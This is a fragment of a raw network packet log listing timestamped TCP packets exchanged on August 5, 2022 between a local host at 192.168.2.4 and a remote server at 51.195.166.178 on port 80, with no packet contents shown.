Aug 5, 2022 13:54:19.625927925 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.625940084 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.625968933 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.625972033 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626010895 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626020908 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626053095 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626065016 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626104116 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626157045 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626204967 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626209021 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626247883 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626251936 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626291037 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626296997 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626332045 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626342058 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626377106 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626380920 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626418114 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626426935 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626461029 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626466036 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626504898 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626511097 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626574039 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626580954 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626625061 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626636982 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626669884 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626676083 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626710892 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626718998 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626754999 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626758099 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626796961 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626802921 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626837969 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626843929 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626879930 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626883984 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626923084 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.626929998 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.626966953 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.634370089 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.634449959 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.634495020 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.634535074 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.634577036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.634589911 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.634618998 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.634653091 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.634660006 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.634682894 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.634701967 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.634741068 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.634744883 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.634785891 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.634802103 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.634826899 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.634846926 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.634869099 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.634891987 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.634910107 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.634916067 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.634953022 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.634953022 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.634993076 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.635003090 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.635032892 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.635034084 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.635071993 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.635075092 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.635117054 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.635118961 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.635159969 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.635166883 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.635200977 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.635201931 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.635241985 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.635243893 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.635283947 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.635286093 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.635324955 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.648586988 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.648637056 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.648679972 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.648720980 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.648761988 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.648780107 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.648804903 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.648838997 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.648847103 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.648865938 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.648890972 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.648909092 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.648933887 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.648935080 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.648973942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649014950 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649019003 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649055004 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649058104 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649097919 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649105072 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649139881 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649142027 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649179935 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649182081 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649220943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649230957 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649261951 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649264097 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649302959 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649311066 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649344921 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649344921 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649385929 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649394035 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649429083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649431944 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649472952 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649472952 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649513006 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649517059 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649553061 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649555922 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649593115 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649595022 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649633884 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649643898 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649674892 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649676085 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649715900 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649719000 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649756908 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649764061 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649799109 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649801016 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649838924 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649842978 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649880886 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649883032 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649950027 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649954081 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.649988890 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.649995089 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.650032043 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.650032043 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.650074959 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.650077105 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.650115967 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.650119066 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.650156975 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.650163889 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.650198936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.650208950 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.650239944 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.650243998 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.650281906 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.650283098 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.650321007 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.650340080 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.650362968 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.650365114 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.650413036 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.650418043 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.650458097 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.650465965 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.650506973 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.656095982 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.656176090 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.656217098 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.656258106 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.656296968 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.656316042 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.656338930 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.656363010 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.656382084 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.656384945 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.656421900 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.656430006 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.656462908 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.656467915 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.656505108 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.656507969 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.656546116 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.656553984 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.656585932 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.656609058 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.656626940 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.656658888 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.656668901 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.656699896 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.656701088 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.656728029 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.656759024 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.693763971 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.694150925 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.538132906 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.590812922 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.590837002 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.590853930 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.590872049 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.590888977 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.590907097 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.590920925 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.590938091 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.590955019 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.590970993 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.590981007 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.591033936 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620064020 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620100021 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620130062 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620141983 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620146036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620183945 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620186090 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620220900 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620223999 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620260954 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620260954 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620300055 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620320082 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620336056 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620340109 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620368958 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620373011 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620409966 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620410919 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620445967 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620470047 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620481968 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620488882 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620526075 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620527983 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620563984 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620574951 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620610952 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620610952 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620647907 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620649099 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620683908 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620685101 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620718956 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620722055 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620758057 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620758057 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620795965 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.620799065 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.620835066 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.649980068 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.650048971 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.650062084 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.650106907 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.650127888 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.650187016 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.650240898 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.650290012 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.650345087 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.650389910 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.650412083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.650454044 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.650475979 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.650523901 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.650562048 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.650602102 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.650605917 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.650638103 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.650645018 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.650681019 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.650685072 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.650718927 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.650724888 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.650763988 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.650764942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.650800943 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.650804996 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.650841951 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.650847912 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.650883913 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.650887966 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.650923014 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.650928020 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.650964022 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.650968075 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651005030 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651005983 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651040077 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651046991 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651082993 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651086092 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651122093 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651125908 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651161909 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651174068 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651211977 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651227951 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651264906 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651268959 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651304007 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651310921 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651355028 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651376009 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651415110 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651417017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651452065 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651458025 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651494980 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651499033 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651539087 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651576042 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651580095 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651618958 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651622057 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651657104 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651659012 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651698112 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651699066 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651736021 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651737928 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651772976 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651777983 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651815891 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651818991 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651855946 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651859045 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651894093 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.651901007 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:20.651938915 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:20.680967093 CEST	80	49778	51.195.166.178	192.168.2.4
